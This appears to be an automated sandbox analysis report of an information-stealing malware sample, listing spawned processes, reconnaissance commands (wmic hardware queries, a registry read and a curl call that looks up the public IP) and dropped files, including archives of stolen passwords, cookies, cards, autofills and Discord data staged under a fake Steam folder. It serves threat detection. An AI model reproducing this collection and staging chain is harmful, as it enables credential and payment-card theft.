"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3560 --field-trial-handle=1916,i,12875924558297911042,14565832975868107828,131072 /prefetch:1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4496 --field-trial-handle=1916,i,12875924558297911042,14565832975868107828,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4636 --field-trial-handle=1916,i,12875924558297911042,14565832975868107828,131072 /prefetch:8

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4748 --field-trial-handle=1916,i,12875924558297911042,14565832975868107828,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4844 --field-trial-handle=1916,i,12875924558297911042,14565832975868107828,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4712 --field-trial-handle=1916,i,12875924558297911042,14565832975868107828,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4908 --field-trial-handle=1916,i,12875924558297911042,14565832975868107828,131072 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffed84746f8,0x7ffed8474708,0x7ffed8474718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffed84746f8,0x7ffed8474708,0x7ffed8474718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2004,11835283909503614669,13383179489750282584,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2008 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2004,11835283909503614669,13383179489750282584,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2328 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2004,11835283909503614669,13383179489750282584,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2736 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,11835283909503614669,13383179489750282584,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,11835283909503614669,13383179489750282584,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3376 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,11835283909503614669,13383179489750282584,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5112 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,11835283909503614669,13383179489750282584,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4140 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,11835283909503614669,13383179489750282584,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5272 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2004,11835283909503614669,13383179489750282584,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5672 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2004,11835283909503614669,13383179489750282584,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5672 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,11835283909503614669,13383179489750282584,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5280 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,11835283909503614669,13383179489750282584,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5760 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,11835283909503614669,13383179489750282584,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5912 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,11835283909503614669,13383179489750282584,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5924 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,11835283909503614669,13383179489750282584,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4680 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=media.mojom.MediaFoundationService --field-trial-handle=2004,11835283909503614669,13383179489750282584,131072 --lang=en-US --service-sandbox-type=mf_cdm --mojo-platform-channel-handle=2136 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2004,11835283909503614669,13383179489750282584,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6116 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2004,11835283909503614669,13383179489750282584,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=6128 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4704 --field-trial-handle=1916,i,12875924558297911042,14565832975868107828,131072 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2004,11835283909503614669,13383179489750282584,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2916 /prefetch:2

Network

Files

C:\Users\Admin\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node

C:\Users\Admin\AppData\Local\Temp\temp.ps1

memory/116-72-0x00007FFEDEA23000-0x00007FFEDEA25000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dw5ramhy.pnl.ps1

memory/116-82-0x000001C9A1560000-0x000001C9A1582000-memory.dmp

memory/116-83-0x00007FFEDEA20000-0x00007FFEDF4E1000-memory.dmp

memory/116-84-0x00007FFEDEA20000-0x00007FFEDF4E1000-memory.dmp

memory/116-85-0x000001C9A38A0000-0x000001C9A38E4000-memory.dmp

memory/116-86-0x000001C9A3CF0000-0x000001C9A3D66000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\coslunty\coslunty.0.cs

\??\c:\Users\Admin\AppData\Local\Temp\coslunty\coslunty.cmdline

\??\c:\Users\Admin\AppData\Local\Temp\coslunty\CSC49F411F94BF644DD95F3BEBC997E183B.TMP

C:\Users\Admin\AppData\Local\Temp\RES4083.tmp

memory/116-99-0x000001C9A1590000-0x000001C9A1598000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\coslunty\coslunty.dll

memory/116-103-0x00007FFEDEA20000-0x00007FFEDF4E1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

memory/2452-115-0x0000022B24E70000-0x0000022B24EC0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\ProgramData\edge\Updater\Get-Clipboard.ps1

C:\ProgramData\edge\Updater\RunBatHidden.vbs

C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat

\??\c:\Users\Admin\AppData\Local\Temp\lssg30o3\lssg30o3.cmdline

\??\c:\Users\Admin\AppData\Local\Temp\lssg30o3\lssg30o3.0.cs

\??\c:\Users\Admin\AppData\Local\Temp\lssg30o3\CSC88193676E09C4075BE3495B5E738BB2C.TMP

C:\Users\Admin\AppData\Local\Temp\RES4769.tmp

memory/2600-190-0x000001E2A8700000-0x000001E2A8708000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\lssg30o3\lssg30o3.dll

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\ProgramData\Steam\Launcher\EN-Tmuacblb\stolen_files.zip

C:\ProgramData\Steam\Launcher\EN-Tmuacblb\Serial-Check.txt

C:\ProgramData\Steam\Launcher\EN-Tmuacblb\Passwords\Passwords.txt

C:\ProgramData\Steam\Launcher\EN-Tmuacblb\Discord\discord.txt

C:\ProgramData\Steam\Launcher\EN-Tmuacblb\debug.log

C:\ProgramData\Steam\Launcher\EN-Tmuacblb\Cookies\Google_Default.txt

C:\ProgramData\Steam\Launcher\EN-Tmuacblb\Cards\Cards.txt

C:\ProgramData\Steam\Launcher\EN-Tmuacblb\Autofills\Autofills.txt

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1

C:\ProgramData\Steam\Launcher\EN-Tmuacblb.zip

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\ProgramData\Steam\Launcher\EN-Tmuacblb\Screenshots\Screenshot.png

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\ProgramData\Steam\Launcher\EN-TMU~1\debug.log

\??\pipe\crashpad_1936_ZHELEHSDTFCUZMZO

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\7860fb57-cbcf-4ca4-b2b2-27472d461584.tmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 0671b025ae42325036aa16875bac29e3
SHA1 d0bf5bd5205ad8da127cb81cf7a44ffb8b35c9a2
SHA256 dc5407fa3eeb79d72de707444ec16fd183c1840e637b6c4a08473c5c4cdd7585
SHA512 8cc3a15a0bb3a8e905e9b207fb9f42e77ecfa8ce46283fe51ca24660db072f61fa4a8f5185e4957561b388eb3f2e766ee5d88c63f06d44b5ddb181108e40f8af

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 65962888aa9f8bff28033e1da7e2ff6e
SHA1 e822b7bd6594e42ea34e30db1675f25a8d362a09
SHA256 937589311dcc02ae0e3cd88e1e2b8fcd26763765f42215215412cf3b2541d30f
SHA512 b680cac0454798bb2804b766d28005e7d972d206d7c19451d8611e2e557eb711862b8747fed24195233560cfca7edf8a0044422c466f560732d6cba16b343433

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 f42e13c3d1fceeecd62a10e3b2e71de7
SHA1 130a9b1184928816e1325a5321641b4186c5dcc4
SHA256 dc7b492cafc646fe73d09440be148ebb13407adcc15757e747d686586bdb9a22
SHA512 e5343c3b5f39d2638355d275cd096aa88c3d8cbd721b1f518f81d7e1ad097b552dc85342f4ca6a6bd64499f15f205db40f221691a8e8848e110334717a551b13

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 b117700d100175a10390509c063fa8d0
SHA1 81e70fad37be516f0ccf9236a4c4fe600955dbd1
SHA256 aa0982aa91f02e4fe40f23403a62bc731f937d1987e578afb7ab854eaa9bb88d
SHA512 2d68236d21e603a651b93618be9d4a538502580f1e816b17cc1ffdad7f634b84c2c88e8f04ef1d7da49867688331a77d8d636b932becc91fb630a30933c3439e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 823c9048e004511db6e78b05057599b1
SHA1 9863cdd21e8716895841c20e9a429817c4851832
SHA256 f28da4f0dd1ca0ab0176fd62871ecda83d01002f22d0b97b4705a870f98afd67
SHA512 5c5c40c62fb5427b80d0323fc410061391a1efd02e766dd553209f9a5dee7c681326dce486938d82f36ba67667e672a841dd6ef136bfeeb1d685c4d04c0c4a02

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe588af5.TMP

MD5 624eac83680b920da3736d9b9c69c160
SHA1 f0af39c89ad3084d5274e372b5f41eab19b7c3c3
SHA256 7c12d06bebbe90291fda7c84ca71916f2b24339ea26931aeb7d0d8dcf6b1c19c
SHA512 9d2c884f8607eef22c7d4267be90f232e56190923c64e911d87ea7715e2a304ffeda8d076b75050f7915c73113f4960cd4bf03a857f641383274493cc7735e93

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 654bd97468086456ac1d3c1bad2ed77b
SHA1 c2951b471fe7bc20ce37e41652b7559f1c46380f
SHA256 6f0fcd9adcba9413e6c73b5f684810180c4aa67bf7110d5b59a5fc0d61750c7d
SHA512 0fe96b2ec1dd649874d6412f67ba16550bf5474c41d00c5a6101b8a4dc25cdfb344efe4b8310765fbad68f63155236c2d864a901ffb38a383685ee6d87ce456e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_www.roblox.com_0.indexeddb.leveldb\MANIFEST-000001

MD5 3fd11ff447c1ee23538dc4d9724427a3
SHA1 1335e6f71cc4e3cf7025233523b4760f8893e9c9
SHA256 720a78803b84cbcc8eb204d5cf8ea6ee2f693be0ab2124ddf2b81455de02a3ed
SHA512 10a3bd3813014eb6f8c2993182e1fa382d745372f8921519e1d25f70d76f08640e84cb8d0b554ccd329a6b4e6de6872328650fefa91f98c3c0cfc204899ee824

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 29ac4c85cb5d714d673ae94b47fbaaf1
SHA1 b68de1095e403c3123addf5ea81d8a0fc3b9fba2
SHA256 b49357f9e8f41345f2e8d734b448175eceb8882cfc74f19603b84a2c02b6d342
SHA512 af1c5d4a0502a90f2ef12b972e390c6f516b58be6628d8fe8a2276d9ba9a76759eba30e0656ca5749e7167d6f7d62ff855f56c78efe12ddec247af8ffc92e873

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 494b7ac2ec50cf97317996875b9ac273
SHA1 de99f85856ceab158048af5a91aa08a2ff993c53
SHA256 ba6eef6705db44c3cc525ece3ca42e8cf996216e324240d91e46bd2376009716
SHA512 0fa952990cfc5f559958c1c0f6314116b5d7dcb01286be9cdceec449a5bf9e3cf490e9b0f0b595ab0aebdfb5832a5dad9373233b614cd8fdba10c975510ca5aa

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 e932ccff7b1089cc3e840c28423c43d7
SHA1 0266709a1731b799b1a8ba4290745948c0bf81c4
SHA256 fd31212946e980581985841da2c0f0f192a4faa30e73cec89d81d27e2e3c2827
SHA512 aadf07d7ed4d0c4722b84a072be78a7c69e247d9f1e084e92cf17155dab323861fc036d6957bdfa1ac420be5f5d7b38d56ef80f021a165b1667d8939a2754be6

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 01c5dbff22c6d0317bbe4bb3098d7c96
SHA1 3e0577212304c62921559f45baf93609ae358f1b
SHA256 905ddc8bd03ca8f16900b86d54341d2d1d4e7055d2ad292c995fe9bff902b7bc
SHA512 ef94dbf95fd5549c2d624bc99651abbbd49c68c07fed8430b3b30a1ea1f331a8bf299efd3597c299750ed0da89a8f56b93fc76b243a964cbfe9090c420571cc8

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 63a3eff9e2cca9c6e6a41537b664b662
SHA1 4241c5c40633b30f31a45e7caad3d8bdc52eb8aa
SHA256 76bd4112af8320946e540ba6999be3f9b1655e31623547ed9a08df68a27cee98
SHA512 611dffd7717193477ed2512f82a793824173f55b7c47801a58be5b141f833cd5d8897ab77b3ae30f04a39dd2fcbbaaffbf5d88e7db7d3ed7f3fcda0fd10950d5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 e252f1068df176a3c486d4fb25effe73
SHA1 8c8724908be6fa0e29587ed74d0c3e23d45cf1d5
SHA256 c9cb4feb2fc4f38b512ea3aa184d549d89b27f8a0614be7a717d4ce3e1e18f39
SHA512 f49958df9369cc160d98a247bd53045382759837a02151a413d0d225ef3a90962e721e99b4207151b9a935d766cb33a1e9c035e4bf2c214ead969b036fddfcba

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 2e63d57769fd4fd1f832d3e2691841e1
SHA1 326c3ef60bc8874dfbd95410e7fb07c194606702
SHA256 3db1491c2fa4a9343eae4c15ae2cf0e522220f8ecfe0172ea24bf40f2d3fc52c
SHA512 a7548d3b1f19e81feac71c8e7aae8b356e5cd844f0e7d5a8bb5c2289fb2510e34415a9da11e33d5480813ec9a275e58e077473c4c45b74cb8f9222fcfa2cb20a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 0cb9a27a279f0a2b486a765e993a3132
SHA1 7e13a314f28b7fd6548de68b37f1abce6ef846a1
SHA256 e7746a7dfe0bb59f5124d2a4cd4ca65a95d1483f7710e0ed3bc043d137f528ce
SHA512 3d25034261dfd4566c064a0773bdae1b2b7cae09d427a48f4dbfd1be9aca0a46db67bc7f03e7ec4c970258eb39af1000131bcfc0efb57fe0799824ed78a4eee9

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 a07276f162db0e70df5c55831382b04b
SHA1 71125a94c64b734c6fc978ec157a70e6a4009a89
SHA256 cd0051acc4e8ce2c194c007c3269cc05ee7d5dea4b020f0bab8398dbc53b1b15
SHA512 fb7b873ae81cd3b12bcfe0bee9d652bae4881bae4dabc933de75087c3a74bdf22ac36eec698cb3ff941247fdce5fda9eb10aa8838fe80364c65063e9a664aafd

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 42fcde8f4def7d287358b7162f2706b6
SHA1 76ad56a88fe9f67fe23273d9d3df7de36e295c62
SHA256 14895a2b6a84b4da7e5e4eca5836e4a0c95973788997fa5f86cd35802bf55759
